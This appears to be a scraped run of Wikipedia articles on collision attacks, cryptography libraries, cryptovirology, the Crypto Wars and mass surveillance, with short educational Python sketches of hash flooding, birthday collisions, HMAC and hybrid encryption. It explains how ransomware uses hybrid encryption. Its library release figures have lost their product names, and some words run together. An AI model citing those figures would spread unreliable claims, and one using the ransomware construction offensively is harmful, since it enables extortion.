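The keyed-hash defence against hash flooding can be illustrated with a toy example. Python's own string hashing already uses a SipHash variant internally, but the standard library does not expose SipHash directly, so the sketch below uses a deliberately weak unkeyed hash to show the attack and a keyed BLAKE2b hash standing in for SipHash to show the defence:

```python
import hashlib, os

def weak_hash(s):
    # Toy unkeyed hash: order-insensitive, so collisions are trivial to craft.
    return sum(s.encode()) % 1024

def keyed_hash(s, key):
    # Keyed hash (BLAKE2b, standing in for SipHash): without the key,
    # an attacker cannot predict which inputs land in the same bucket.
    digest = hashlib.blake2b(s.encode(), key=key, digest_size=8).digest()
    return int.from_bytes(digest, 'big') % 1024

# An attacker can flood one bucket of the unkeyed hash: all anagrams collide.
payload = ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']
print({weak_hash(s) for s in payload})        # a single bucket value

key = os.urandom(16)                          # secret, per-process key
print({keyed_hash(s, key) for s in payload})  # spread across buckets
```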
It is possible to perform an analogous attack to fill upBloom filtersusing a (partial) preimage attack.[19]
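The 2^(n/2) birthday bound discussed at the start of this article can also be demonstrated directly by truncating a strong hash: a collision in the first 32 bits of SHA-256 typically appears after hashing on the order of 2^16 random messages. A minimal sketch:

```python
import hashlib, itertools, os

def truncated_sha256(data, bits=32):
    """Return the top `bits` bits of SHA-256(data) as an integer."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, 'big') >> (256 - bits)

# Birthday search: remember every truncated hash seen; by the birthday
# problem a 32-bit truncation collides after very roughly 2**16 tries,
# not the 2**32 a brute-force preimage search would need.
seen = {}
for i in itertools.count(1):
    msg = os.urandom(16)
    h = truncated_sha256(msg)
    if h in seen and seen[h] != msg:
        print(f"collision after {i} messages:")
        print(seen[h].hex(), "and", msg.hex(), f"both -> {h:08x}")
        break
    seen[h] = msg
```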
https://en.wikipedia.org/wiki/Collision_attack
The tables below compare cryptography libraries that deal with cryptography algorithms and have application programming interface (API) function calls to each of the supported features. Latest-release figures from the comparison include: Micro Edition Suite 5.0.3 (December 3, 2024)[8] and Crypto-J 7.0.1 (March 17, 2025);[9] 6.3.1 (May 15, 2025);[10] 23.0.1, 21.0.5 LTS, 17.0.13 LTS, 11.0.25 LTS, and 8u431 LTS (all October 15, 2024);[13][14][15][16][17] 2.27.0 and 2.16.11 (both July 7, 2021); and 3.10.1 (December 30, 2024).[23] This table denotes whether a cryptography library provides the technical requisites for FIPS 140, and the status of its FIPS 140 certification (according to NIST's CMVP search,[27] modules-in-process list[28] and implementation-under-test list).[29] Key operations include key generation algorithms, key exchange agreements, and public key cryptography standards. Comparison of supported cryptographic hash functions. Here hash functions are defined as taking an arbitrary-length message and producing a fixed-size output that is virtually impossible to use for recreating the original message. Comparison of implementations of message authentication code (MAC) algorithms. A MAC is a short piece of information used to authenticate a message, in other words, to confirm that the message came from the stated sender (its authenticity) and has not been changed in transit (its integrity). The table compares implementations of block ciphers. Block ciphers are defined as being deterministic and operating on a set number of bits (termed a block) using a symmetric key. Each block cipher can be broken up into the possible key sizes and block cipher modes it can be run with. The table below shows the support of various stream ciphers. Stream ciphers are defined as using plain text digits that are combined with a pseudorandom cipher digit stream. Stream ciphers are typically faster than block ciphers and may have lower hardware complexity, but may be more susceptible to attacks. These tables compare the ability to use hardware-enhanced cryptography. By using the assistance of specific hardware, the library can achieve greater speeds and/or improved security than otherwise. (kSLOC = 1000 lines of source code)
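As a concrete illustration of the MAC concept compared in the tables above, the following sketch uses Python's standard library rather than any of the C libraries being compared; the key and messages are placeholders:

```python
import hmac, hashlib

key = b'shared-secret-key'          # placeholder key for illustration
message = b'amount=100&to=alice'

# Sender computes a tag binding the message to the shared key.
tag = hmac.new(key, message, hashlib.sha256).hexdigest()

# Receiver recomputes the tag and compares in constant time:
# a match confirms both authenticity and integrity.
check = hmac.new(key, message, hashlib.sha256).hexdigest()
print(hmac.compare_digest(tag, check))     # True

# Any tampering changes the tag and verification fails.
forged = hmac.new(key, b'amount=999&to=mallory', hashlib.sha256).hexdigest()
print(hmac.compare_digest(tag, forged))    # False
```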
https://en.wikipedia.org/wiki/Comparison_of_cryptography_libraries
Cryptovirology refers to the study of cryptography use in malware, such as ransomware and asymmetric backdoors.[citation needed] Traditionally, cryptography and its applications are defensive in nature, and provide privacy, authentication, and security to users. Cryptovirology employs a twist on cryptography, showing that it can also be used offensively. It can be used to mount extortion-based attacks that cause loss of access to information, loss of confidentiality, and information leakage, tasks which cryptography typically prevents.[1] The field was born with the observation that public-key cryptography can be used to break the symmetry between what an antivirus analyst sees regarding malware and what the attacker sees. The antivirus analyst sees a public key contained in the malware, whereas the attacker sees the public key contained in the malware as well as the corresponding private key (outside the malware), since the attacker created the key pair for the attack. The public key allows the malware to perform trapdoor one-way operations on the victim's computer that only the attacker can undo. The field encompasses covert malware attacks in which the attacker securely steals private information such as symmetric keys, private keys, PRNG state, and the victim's data. Examples of such covert attacks are asymmetric backdoors. An asymmetric backdoor is a backdoor (e.g., in a cryptosystem) that can be used only by the attacker, even after it is found. This contrasts with the traditional backdoor, which is symmetric, i.e., anyone who finds it can use it. Kleptography, a subfield of cryptovirology, is the study of asymmetric backdoors in key generation algorithms, digital signature algorithms, key exchanges, pseudorandom number generators, encryption algorithms, and other cryptographic algorithms. The NIST Dual EC DRBG random bit generator has an asymmetric backdoor in it. The EC-DRBG algorithm utilizes the discrete-log kleptogram from kleptography, which by definition makes the EC-DRBG a cryptotrojan. Like ransomware, the EC-DRBG cryptotrojan contains and uses the attacker's public key to attack the host system. The cryptographer Ari Juels indicated that the NSA effectively orchestrated a kleptographic attack on users of the Dual EC DRBG pseudorandom number generation algorithm and that, although security professionals and developers have been testing and implementing kleptographic attacks since 1996, "you would be hard-pressed to find one in actual use until now."[2] Due to public outcry about this cryptovirology attack, NIST rescinded the EC-DRBG algorithm from the NIST SP 800-90 standard.[3] Covert information leakage attacks carried out by cryptoviruses, cryptotrojans, and cryptoworms that, by definition, contain and use the public key of the attacker are a major theme in cryptovirology. In "deniable password snatching," a cryptovirus installs a cryptotrojan that asymmetrically encrypts host data and covertly broadcasts it. This makes it available to everyone, noticeable by no one (except the attacker),[citation needed] and only decipherable by the attacker. An attacker caught installing the cryptotrojan claims to be a virus victim.[citation needed] An attacker observed receiving the covert asymmetric broadcast is one of thousands, if not millions, of receivers, and exhibits no identifying information whatsoever. The cryptovirology attack achieves "end-to-end deniability." It is a covert asymmetric broadcast of the victim's data.
Cryptovirology also encompasses the use of private information retrieval (PIR) to allow cryptoviruses to search for and steal host data without revealing the data searched for, even when the cryptotrojan is under constant surveillance.[4] By definition, such a cryptovirus carries within its own coding sequence the query of the attacker and the necessary PIR logic to apply the query to host systems. The first cryptovirology attack and discussion of the concept was by Adam L. Young and Moti Yung, at the time called "cryptoviral extortion", and it was presented at the 1996 IEEE Security & Privacy conference.[1][5] In this attack, a cryptovirus, cryptoworm, or cryptotrojan contains the public key of the attacker and hybrid encrypts the victim's files. The malware prompts the user to send the asymmetric ciphertext to the attacker, who will decipher it and return the symmetric decryption key it contains for a fee. The victim needs the symmetric key to decrypt the encrypted files if there is no other way to recover the original files (e.g., from backups). The 1996 IEEE paper predicted that cryptoviral extortion attackers would one day demand e-money, long before Bitcoin even existed. Many years later, the media relabeled cryptoviral extortion as ransomware. In 2016, cryptovirology attacks on healthcare providers reached epidemic levels, prompting the U.S. Department of Health and Human Services to issue a Fact Sheet on Ransomware and HIPAA.[6] The fact sheet states that when electronic protected health information is encrypted by ransomware, a breach has occurred, and the attack therefore constitutes a disclosure that is not permitted under HIPAA, the rationale being that an adversary has taken control of the information. Sensitive data might never leave the victim organization, but the break-in may have allowed data to be sent out undetected. California enacted a law that defines the introduction of ransomware into a computer system with the intent of extortion as being against the law.[7] While viruses in the wild have used cryptography in the past, the only purpose of such usage of cryptography was to avoid detection by antivirus software. For example, the Tremor virus[8] used polymorphism as a defensive technique in an attempt to avoid detection by anti-virus software. Though cryptography does assist in such cases to enhance the longevity of a virus, the capabilities of cryptography are not used in the payload. The One-half virus was amongst the first viruses known to have encrypted affected files. An example of a virus that informs the owner of the infected machine to pay a ransom is the virus nicknamed Tro_Ransom.A.[9] This virus asks the owner of the infected machine to send $10.99 to a given account through Western Union. Virus.Win32.Gpcode.ag is a classic cryptovirus.[10] This virus partially uses a version of 660-bit RSA and encrypts files with many different extensions. It instructs the owner of the machine to email a given mail ID if the owner desires the decryptor. If contacted by email, the user will be asked to pay a certain amount as ransom in return for the decryptor. It has been demonstrated that using just 8 different calls to Microsoft's Cryptographic API (CAPI), a cryptovirus can satisfy all its encryption needs.[11] Apart from cryptoviral extortion, there are other potential uses of cryptoviruses,[4] such as deniable password snatching, cryptocounters, private information retrieval, and secure communication between different instances of a distributed cryptovirus.
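The hybrid encryption pattern described above (a fresh symmetric key for the bulk data, wrapped under a public key so that only the private-key holder can recover it) is the same construction used legitimately by tools such as PGP and TLS. A minimal sketch using the third-party Python cryptography package; the key size, nonce handling, and sample data are illustrative assumptions:

```python
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# Key pair: the public half could ship anywhere; the private half does not.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

data = b"example file contents"          # placeholder data

# 1. Encrypt the bulk data under a fresh symmetric key.
sym_key = AESGCM.generate_key(bit_length=256)
nonce = os.urandom(12)
ciphertext = AESGCM(sym_key).encrypt(nonce, data, None)

# 2. Wrap the symmetric key under the public key (RSA-OAEP).
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
wrapped_key = public_key.encrypt(sym_key, oaep)

# Only the private-key holder can unwrap the key and recover the data;
# an analyst who extracts the public key from the code cannot.
recovered_key = private_key.decrypt(wrapped_key, oaep)
assert AESGCM(recovered_key).decrypt(nonce, ciphertext, None) == data
```

The asymmetry Young and Yung identified is visible here: everything needed to encrypt is public, while decryption requires a secret that never appears on the victim's machine.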
https://en.wikipedia.org/wiki/Cryptovirology
Attempts, unofficially dubbed the "Crypto Wars", have been made by theUnited States(US) and allied governments to limit the public's and foreign nations' access tocryptographystrong enough to thwartdecryptionby national intelligence agencies, especially theNational Security Agency(NSA).[1][2] In the early days of theCold War, the U.S. and its allies developed an elaborate series of export control regulations designed to prevent a wide range of Western technology from falling into the hands of others, particularly theEastern bloc. All export of technology classed as 'critical' required a license.CoComwas organized to coordinate Western export controls. Two types of technology were protected: technology associated only with weapons of war ("munitions") and dual use technology, which also had commercial applications. In the U.S., dual use technology export was controlled by theDepartment of Commerce, while munitions were controlled by theState Department. Since in the immediate postWWIIperiod the market for cryptography was almost entirely military, the encryption technology (techniques as well as equipment and, after computers became important, crypto software) was included as a Category XIII item into theUnited States Munitions List. The multinational control of the export of cryptography on the Western side of the cold war divide was done via the mechanisms of CoCom. By the 1960s, however, financial organizations were beginning to require strong commercialencryptionon the rapidly growing field of wired money transfer. The U.S. Government's introduction of theData Encryption Standardin 1975 meant that commercial uses of high quality encryption would become common, and serious problems of export control began to arise. Generally these were dealt with through case-by-case export license request proceedings brought by computer manufacturers, such asIBM, and by their large corporate customers. Encryption export controls became a matter of public concern with the introduction of thepersonal computer.Phil Zimmermann'sPGPcryptosystemand its distribution on theInternetin 1991 was the first major 'individual level' challenge to controls on export of cryptography. The growth ofelectronic commercein the 1990s created additional pressure for reduced restrictions.[3]Shortly afterward,Netscape'sSSLtechnology was widely adopted as a method for protecting credit card transactions usingpublic key cryptography. SSL-encrypted messages used theRC4cipher, and used 128-bitkeys. U.S. government export regulations would not permit crypto systems using 128-bit keys to be exported.[4]At this stage Western governments had, in practice, a split personality when it came to encryption; policy was made by the military cryptanalysts, who were solely concerned with preventing their 'enemies' acquiring secrets, but that policy was then communicated to commerce by officials whose job was to support industry. The longestkey sizeallowed for export without individual license proceedings was40 bits, so Netscape developed two versions of itsweb browser. The "U.S. edition" had the full 128-bit strength. The "International Edition" had its effective key length reduced to 40 bits by revealing 88 bits of the key in the SSLprotocol. Acquiring the 'U.S. domestic' version turned out to be sufficient hassle that most computer users, even in the U.S., ended up with the 'International' version,[5]whose weak40-bit encryptioncould be broken in a matter of days using a single personal computer. 
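The practical gap between a 40-bit export key and larger keys is easy to quantify with back-of-the-envelope arithmetic; the trial rate below is an assumed figure for illustration, not a measured one:

```python
# Exhaustive key search time as a function of key length.
# The trial rate is an assumed figure for illustration only.
rate = 2_000_000                      # assumed key trials per second
for bits in (40, 56, 128):
    seconds = 2**bits / rate          # worst case: try every key
    print(f"{bits:3d}-bit key: {seconds / 86400:.3g} days")
# 40-bit:  ~6.4 days   -- "a matter of days", as noted above
# 56-bit:  ~4.2e5 days -- roughly a millennium at this rate
# 128-bit: ~2e27 days  -- infeasible by exhaustion at any rate
```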
A similar situation occurred withLotus Notesfor the same reasons.[6] Legal challengesbyPeter Jungerand other civil libertarians and privacy advocates, the widespread availability of encryption software outside the U.S., and the perception by many companies that adverse publicity aboutweak encryptionwas limiting their sales and the growth of e-commerce, led to a series of relaxations in US export controls, culminating in 1996 in PresidentBill Clintonsigning theExecutive order13026[7]transferring the commercial encryption from the Munition List to theCommerce Control List. Furthermore, the order stated that, "the software shall not be considered or treated as 'technology'" in the sense ofExport Administration Regulations. This order permitted theUnited States Department of Commerceto implement rules that greatly simplified the export of proprietary andopen sourcesoftware containing cryptography, which they did in 2000.[8] As of 2009, non-military cryptography exports from the U.S. are controlled by the Department of Commerce'sBureau of Industry and Security.[9]Some restrictions still exist, even for mass market products, particularly with regard to export to "rogue states" andterroristorganizations. Militarized encryption equipment,TEMPEST-approved electronics, custom cryptographic software, and even cryptographic consulting services still require an export license[9](pp. 6–7). Furthermore, encryption registration with the BIS is required for the export of "mass market encryption commodities, software and components with encryption exceeding 64 bits" (75FR36494). In addition, other items require a one-time review by or notification to BIS prior to export to most countries.[9]For instance, the BIS must be notified before open-source cryptographic software is made publicly available on the Internet, though no review is required.[10]Export regulations have been relaxed from pre-1996 standards, but are still complex.[9]Other countries, notably those participating in theWassenaar Arrangement,[11]have similar restrictions.[12] Until 1996, thegovernment of the United Kingdomwithheld export licenses from exporters unless they used weak ciphers or short keys, and generally discouraged practical public cryptography.[13]A debate about cryptography for the NHS brought this out in the open.[13] The Clipper chip was designed for the NSA in the 1990s for secure landline phones, which implemented encryption with an announcedbackdoorfor the US government.[3]The US government tried to get manufacturers to adopt the chip, but without success. Meanwhile, much stronger software encryption became available worldwide. Academics also demonstrated fatal flaws in the chip's backdoor protocol. The effort was finally abandoned by 1996. A5/1is astream cipherused to provide over-the-air communicationprivacyin theGSMcellular telephonestandard. Security researcherRoss Andersonreported in 1994 that "there was a terrific row between theNATOsignal intelligence agenciesin the mid-1980s over whether GSM encryption should be strong or not. The Germans said it should be, as they shared a long border with theWarsaw Pact; but the other countries didn't feel this way, and the algorithm as now fielded is a French design."[14] According to professor Jan Arild Audestad, at the standardization process which started in 1982, A5/1 was originally proposed to have a key length of 128 bits. At that time, 128 bits was projected to be secure for at least 15 years. It is now estimated that 128 bits would in fact also still be secure as of 2014. 
Audestad, Peter van der Arend, and Thomas Haug say that the British insisted on weaker encryption, with Haug saying he was told by the British delegate that this was to allow the British secret service to eavesdrop more easily. The British proposed a key length of 48 bits, while the West Germans wanted stronger encryption to protect against East German spying, so the compromise became a key length of 56 bits.[15] In general, a key of length 56 is 2^(128−56) = 2^72 ≈ 4.7 × 10^21 times easier to break than a key of length 128. The widely used DES encryption algorithm was originally planned by IBM to have a key size of 128 bits;[16] the NSA lobbied for a key size of 48 bits. The end compromise was a key size of 64 bits, 8 of which were parity bits, giving an effective key security parameter of 56 bits.[17] DES was considered insecure as early as 1977,[18] and documents leaked in the 2013 Snowden leaks show that it was in fact easily crackable by the NSA, but it was still recommended by NIST.[19] The DES Challenges were a series of brute force attack contests created by RSA Security to highlight the lack of security provided by the Data Encryption Standard. As part of the successful cracking of the DES-encoded messages, the EFF constructed a specialized DES-cracking computer nicknamed Deep Crack. The successful cracking of DES likely helped to gather both political and technical support for more advanced encryption in the hands of ordinary citizens.[20] In 1997, NIST began a competition to select a replacement for DES, resulting in the publication in 2000 of the Advanced Encryption Standard (AES).[21] AES is still considered secure as of 2019, and the NSA considers AES strong enough to protect information classified at the Top Secret level.[22] Fearing widespread adoption of encryption, the NSA set out to stealthily influence and weaken encryption standards and obtain master keys, whether by agreement, by force of law, or by computer network exploitation (hacking).[3][23] According to the New York Times: "But by 2006, an N.S.A. document notes, the agency had broken into communications for three foreign airlines, one travel reservation system, one foreign government's nuclear department and another's Internet service by cracking the virtual private networks that protected them. By 2010, the Edgehill program, the British counterencryption effort, was unscrambling VPN traffic for 30 targets and had set a goal of an additional 300."[23] As part of Bullrun, the NSA has also been actively working to "insert vulnerabilities into commercial encryption systems, IT systems, networks, and endpoint communications devices used by targets".[24] The New York Times has reported that the random number generator Dual EC DRBG contains a back door from the NSA, which would allow the NSA to break encryption relying on that random number generator.[25] Even though Dual_EC_DRBG was known to be an insecure and slow random number generator soon after the standard was published, and the potential NSA backdoor was found in 2007, and alternative random number generators without these flaws were certified and widely available, RSA Security continued using Dual_EC_DRBG in the company's BSAFE toolkit and Data Protection Manager until September 2013.
While RSA Security has denied knowingly inserting a backdoor into BSAFE, it has not yet given an explanation for the continued usage of Dual_EC_DRBG after its flaws became apparent in 2006 and 2007.[26] However, it was reported on December 20, 2013, that RSA had accepted a payment of $10 million from the NSA to set the random number generator as the default.[27][28] Leaked NSA documents state that their effort was "a challenge in finesse" and that "Eventually, N.S.A. became the sole editor" of the standard. By 2010, the NSA had developed "groundbreaking capabilities" against encrypted Internet traffic. A GCHQ document warned, however: "These capabilities are among the Sigint community's most fragile, and the inadvertent disclosure of the simple 'fact of' could alert the adversary and result in immediate loss of the capability."[23] Another internal document stated that "there will be NO 'need to know.'"[23] Several experts, including Bruce Schneier and Christopher Soghoian, have speculated that a successful attack against RC4, a 1987 encryption algorithm still used in at least 50 per cent of all SSL/TLS traffic, is a plausible avenue, given several publicly known weaknesses of RC4.[29] Others have speculated that the NSA has gained the ability to crack 1024-bit RSA and Diffie–Hellman public keys.[30] A team of researchers has pointed out that there is wide reuse of a few non-ephemeral 1024-bit primes in Diffie–Hellman implementations, and that the NSA having done precomputation against those primes in order to break encryption using them in real time is very plausibly what the NSA's "groundbreaking capabilities" refer to.[31] The Bullrun program is controversial, in that it is believed that the NSA deliberately inserts or keeps secret vulnerabilities which affect both law-abiding US citizens and the NSA's targets, under its NOBUS policy.[32] In theory, the NSA has two jobs: prevent vulnerabilities that affect the US, and find vulnerabilities that can be used against US targets; but, as argued by Bruce Schneier, the NSA seems to prioritize finding (or even creating) and keeping vulnerabilities secret. Bruce Schneier has called for the NSA to be broken up so that the group charged with strengthening cryptography is not subservient to the groups that want to break the cryptography of its targets.[33] As part of the Snowden leaks, it became widely known that intelligence agencies could bypass encryption of data stored on Android and iOS smartphones by legally ordering Google and Apple to bypass the encryption on specific phones. Around 2014, as a reaction to this, Google and Apple redesigned their encryption so that they did not have the technical ability to bypass it, and it could only be unlocked by knowing the user's password.[34][35] Various law enforcement officials, including the Obama administration's Attorney General Eric Holder,[36] responded with strong condemnation, calling it unacceptable that the state could not access alleged criminals' data even with a warrant. In one of the more iconic responses, the chief of detectives for Chicago's police department stated that "Apple will become the phone of choice for the pedophile".[37] The Washington Post posted an editorial insisting that "smartphone users must accept that they cannot be above the law if there is a valid search warrant", and, after agreeing that backdoors would be undesirable, suggested implementing a "golden key" backdoor which would unlock the data with a warrant.[38][39] FBI Director James Comey cited a number of cases to support the need to decrypt smartphones.
Interestingly, in none of the presumably carefully handpicked cases did the smartphone have anything to do with the identification or capture of the culprits, and the FBI seems to have been unable to find any strong cases supporting the need for smartphone decryption.[40] Bruce Schneierhas labelled the right to smartphone encryption debateCrypto Wars II,[41]whileCory Doctorowcalled itCrypto Wars redux.[42] Legislators in the US states of California[43]and New York[44]have proposed bills to outlaw the sale of smartphones with unbreakable encryption. As of February 2016, no bills have been passed. In February 2016 the FBI obtained a court order demanding that Apple create andelectronically signnew software which would enable the FBI to unlock aniPhone 5cit recovered fromone of the shootersin the 2015 terroristattack in San Bernardino, California. Apple challenged the order. In the end the FBI hired a third party to crack the phone.SeeFBI–Apple encryption dispute. In April 2016,Dianne FeinsteinandRichard Burrsponsored a bill, described as "overly vague" by some,[45]that would be likely to criminalise all forms ofstrong encryption.[46][47] In December 2019, theUnited States Senate Committee on the Judiciaryconvened a hearing on Encryption and Lawful Access, focusing on encrypted smartphone storage.[48]District AttorneyCyrus Vance Jr., Professor Matt Tait, Erik Neuenschwander from Apple, and Jay Sullivan from Facebook testified. ChairmanLindsey Grahamstated in his opening remarks "all of us want devices that protect our privacy." He also said law enforcement should be able to read encrypted data on devices, threatening to pass legislation if necessary: "You're going to find a way to do this or we're going to do this for you."[49] In October 2017, Deputy Attorney GeneralRod Rosensteincalled for key escrow under the euphemism "responsible encryption"[50]as a solution to the ongoing problem of "going dark".[51]This refers to wiretapping court orders and police measures becoming ineffective as strongend-to-end encryptionis increasingly added to widespread messenger products. Rosenstein suggestedkey escrowwould provide their customers with a way to recover their encrypted data if they forget their password, so that it is not lost forever. From a law enforcement perspective, this would allow a judge to issue a search warrant instructing the company to decrypt the data; without escrow or other undermining of encryption it is impossible for a service provider to comply with this request. In contrast to previous proposals, the decentralized storage of keys by companies instead of government agencies is claimed to be an additional safeguard. In 2015 the head of the NSA,Admiral Michael S. Rogers, suggested further decentralizing the key escrow by introducing "front doors" instead of back doors into encryption.[52]This way, the key would be split into two halves: one kept by government authorities and the other by the company responsible for the encryption product. The government would thus still need a search warrant to obtain the company's half-key, while the company would be unable to abuse the key escrow to access users' data without the government's half-key. 
Experts were not impressed.[53][52] In 2018, the NSA promoted the use of "lightweight encryption", in particular its ciphersSimonandSpeck, forInternet of Thingsdevices.[54]However, the attempt to have those ciphers standardized by ISO failed because of severe criticism raised by the board of cryptography experts which provoked fears that the NSA had non-public knowledge of how to break them.[55] Following the 2015Charlie Hebdoshooting, a terrorism attack, formerUK Prime MinisterDavid Cameroncalled for outlawing non-backdoored cryptography, saying that there should be no "means of communication" which "we cannot read".[56][57]US president Barack Obama sided with Cameron on this.[58]This call for action does not seem to have resulted in any legislation or changes in the status quo of non-backdoored cryptography being legal and available. TheEliminating Abusive and Rampant Neglect of Interactive Technologies(EARN IT) Act of 2020 provides for a 19-member National Commission which will develop a set of "best practice" guidelines to which technology providers will have to conform in order to "earn" immunity (traditionally provided 'automatically' bySection 230 of the Communications Decency Act) to liability for child sexual abuse material on their platforms. Proponents present it as a way to tackle child sexual abuse material on internet platforms, but it has been criticized by advocates of encryption because it is likely that the "best practices" devised by the commission will include refraining from using end-to-end encryption, as such encryption would make it impossible to screen for illegal content.[59][60]
https://en.wikipedia.org/wiki/Crypto_Wars
The Encyclopedia of Cryptography and Security is a comprehensive work on cryptography for both information security professionals and experts in the fields of computer science, applied mathematics, engineering, information theory, data encryption, etc.[1] It consists of 460 articles in alphabetical order and is available electronically and in print. The Encyclopedia has a representative Advisory Board consisting of 18 leading international specialists. Topics include, but are not limited to, authentication and identification, copy protection, cryptanalysis and security, factorization algorithms and primality tests, cryptographic protocols, key management, electronic payments and digital certificates, hash functions and MACs, elliptic curve cryptography, quantum cryptography, and web security. The articles are explanatory in character and can be used for undergraduate or graduate courses.
https://en.wikipedia.org/wiki/Encyclopedia_of_Cryptography_and_Security
Global mass surveillance can be defined as the mass surveillance of entire populations across national borders.[1] Its existence was not widely acknowledged by governments and the mainstream media until the global surveillance disclosures by Edward Snowden triggered a debate about the right to privacy in the Digital Age.[2][3] One such debate concerns the balance that governments must strike between the pursuit of national security and counter-terrorism on the one hand and the right to privacy on the other. As H. Akın Ünver puts it: "Even when conducted for national security and counterterrorism purposes, the scale and detail of mass citizen data collected, leads to rightfully pessimistic observations about individual freedoms and privacy".[4] Its roots can be traced back to the middle of the 20th century, when the UKUSA Agreement was jointly enacted by the United Kingdom and the United States, which later expanded to Canada, Australia, and New Zealand to create the present Five Eyes alliance.[5] The alliance developed cooperation arrangements with several "third-party" nations. Eventually, this resulted in the establishment of a global surveillance network, code-named "ECHELON" (1971).[6][7] The origins of global surveillance can be traced back to the late 1940s, after the UKUSA Agreement was collaboratively enacted by the United Kingdom and the United States, which eventually culminated in the creation of the global surveillance network code-named "ECHELON" in 1971.[6][7] In the aftermath of the 1970s Watergate affair and a subsequent congressional inquiry led by Sen. Frank Church,[8] it was revealed that the NSA, in collaboration with Britain's GCHQ, had routinely intercepted the international communications of prominent anti-Vietnam War leaders such as Jane Fonda and Dr. Benjamin Spock.[9] Decades later, a multi-year investigation by the European Parliament highlighted the NSA's role in economic espionage in a 1999 report entitled 'Development of Surveillance Technology and Risk of Abuse of Economic Information'.[10] However, for the general public, it was a series of detailed disclosures of internal NSA documents in June 2013 that first revealed the massive extent of the NSA's spying, both foreign and domestic. Most of these were leaked by an ex-contractor, Edward Snowden. Even so, a number of these older global surveillance programs, such as PRISM, XKeyscore, and Tempora, were referenced in the 2013 release of thousands of documents.[11] Many countries around the world, including Western Allies and member states of NATO, have been targeted by the "Five Eyes" strategic alliance of Australia, Canada, New Zealand, the UK, and the United States, five English-speaking Western countries aiming to achieve Total Information Awareness by mastering the Internet with analytical tools such as Boundless Informant.[12] As confirmed by the NSA's director Keith B. Alexander on 26 September 2013, the NSA collects and stores all phone records of all American citizens.[13] Much of the data is kept in large storage facilities such as the Utah Data Center, a US$1.5 billion megaproject referred to by The Wall Street Journal as a "symbol of the spy agency's surveillance prowess."[14] Today, this global surveillance system continues to grow. It now collects so much digital detritus (e-mails, calls, text messages, cellphone location data and a catalog of computer viruses) that the N.S.A. is building a 1-million-square-foot facility in the Utah desert to store and process it.
On 6 June 2013, Britain's The Guardian newspaper began publishing a series of revelations by an as yet unknown American whistleblower, revealed several days later to be the ex-CIA and ex-NSA-contracted systems analyst Edward Snowden. Snowden gave a cache of documents to two journalists, Glenn Greenwald and Laura Poitras. Greenwald later estimated that the cache contained 15,000–20,000 documents, some very large and detailed, and some very small.[16][17] Over the two subsequent months of publications, it became clear that the NSA had operated a complex web of spying programs that allowed it to intercept Internet and telephone conversations from over a billion users in dozens of countries around the world. Specific revelations were made about China, the European Union, Latin America, Iran and Pakistan, and Australia and New Zealand; however, the published documentation reveals that many of the programs indiscriminately collected bulk information directly from central servers and Internet backbones, which almost invariably carry and reroute information from distant countries.[citation needed] Due to this central server and backbone monitoring, many of the programs overlapped and interrelated with one another. These programs were often carried out with the assistance of US entities such as the United States Department of Justice and the FBI,[18] were sanctioned by US laws such as the FISA Amendments Act, and the necessary court orders for them were signed by the secret Foreign Intelligence Surveillance Court. Some of the NSA's programs were directly aided by national and foreign intelligence agencies, Britain's GCHQ and Australia's ASD, as well as by large private telecommunications and Internet corporations such as Verizon, Telstra,[19] Google, and Facebook.[20] Snowden's disclosures of the NSA's surveillance activities are a continuation of news leaks which have been ongoing since the early 2000s. One year after the September 11, 2001, attacks, former U.S. intelligence official William Binney was publicly critical of the NSA for spying on U.S. citizens.[21] Further disclosures followed. On 16 December 2005, The New York Times published a report under the headline "Bush Lets U.S. Spy on Callers Without Courts."[22] In 2006, further evidence of the NSA's domestic surveillance of U.S. citizens was provided by USA Today. The newspaper released a report on 11 May 2006 regarding the NSA's "massive database" of phone records collected from "tens of millions" of U.S. citizens. According to USA Today, these phone records were provided by several telecom companies such as AT&T, Verizon, and BellSouth.[23] In 2008, the security analyst Babak Pasdar revealed the existence of the so-called "Quantico circuit" that he and his team discovered in 2003 when brought on to update the carrier's security system. The circuit provided the U.S. federal government with a backdoor into the network of an unnamed wireless provider, which was later independently identified as Verizon.[24] Snowden made his first contact with the journalist Glenn Greenwald of The Guardian in late 2012.[25] The timeline of mass surveillance disclosures by Snowden continued throughout the entire year of 2013. Documents leaked by Snowden in 2013 include court orders, memos, and policy documents related to a wide range of surveillance activities.
According to the April 2013 summary of documents leaked by Snowden, other than to combat terrorism, these surveillance programs were employed to assess the foreign policy and economic stability of other countries,[26] and to gather "commercial secrets".[27] In a statement addressed to the National Congress of Brazil in early August 2013, the journalist Glenn Greenwald maintained that the U.S. government had used counter-terrorism as a pretext for clandestine surveillance in order to compete with other countries in the "business, industrial and economic fields".[28][29] In a December 2013 letter to the Brazilian government, Snowden wrote that "These programs were never about terrorism: they're about economic spying, social control, and diplomatic manipulation. They're about power."[30] According to a White House panel member, the NSA did not stop any terrorist attacks.[31] However, the NSA chief stated that surveillance programs stopped 54 terrorist plots.[32] In an interview with Der Spiegel published on 12 August 2013, former NSA Director Michael Hayden admitted that "We (the NSA) steal secrets. We're number one in it". Hayden also added: "We steal stuff to make you safe, not to make you rich".[26] According to documents seen by the news agency Reuters, these "secrets" were subsequently funneled to authorities across the nation to help them launch criminal investigations of Americans.[33] Federal agents are then instructed to "recreate" the investigative trail in order to "cover up" where the information originated.[33] According to the congressional testimony of Keith B. Alexander, Director of the National Security Agency, one of the purposes of its data collection is to store all the phone records inside a place that can be searched and assessed at all times. When asked by Senator Mark Udall if the goal of the NSA is to collect the phone records of all Americans, Alexander replied, "Yes, I believe it is in the nation's best interest to put all the phone records into a lockbox that we could search when the nation needs to do it."[34] Other applications of global surveillance include the identification and containment of emerging global outbreaks. In 2003, global surveillance mechanisms were used to fight the SARS pandemic.[35] In the United States, the NSA is collecting the phone records of more than 300 million Americans.[36] The international surveillance tool XKeyscore allows government analysts to search through vast databases containing emails, online chats and the browsing histories of millions of individuals.[37][38][39] Britain's global surveillance program Tempora intercepts the fibre-optic cables that form the backbone of the Internet.[40] Under the NSA's PRISM surveillance program, data that has already reached its final destination is harvested directly from the servers of the following U.S. service providers: Microsoft, Yahoo!, Google, Facebook, Paltalk, AOL, 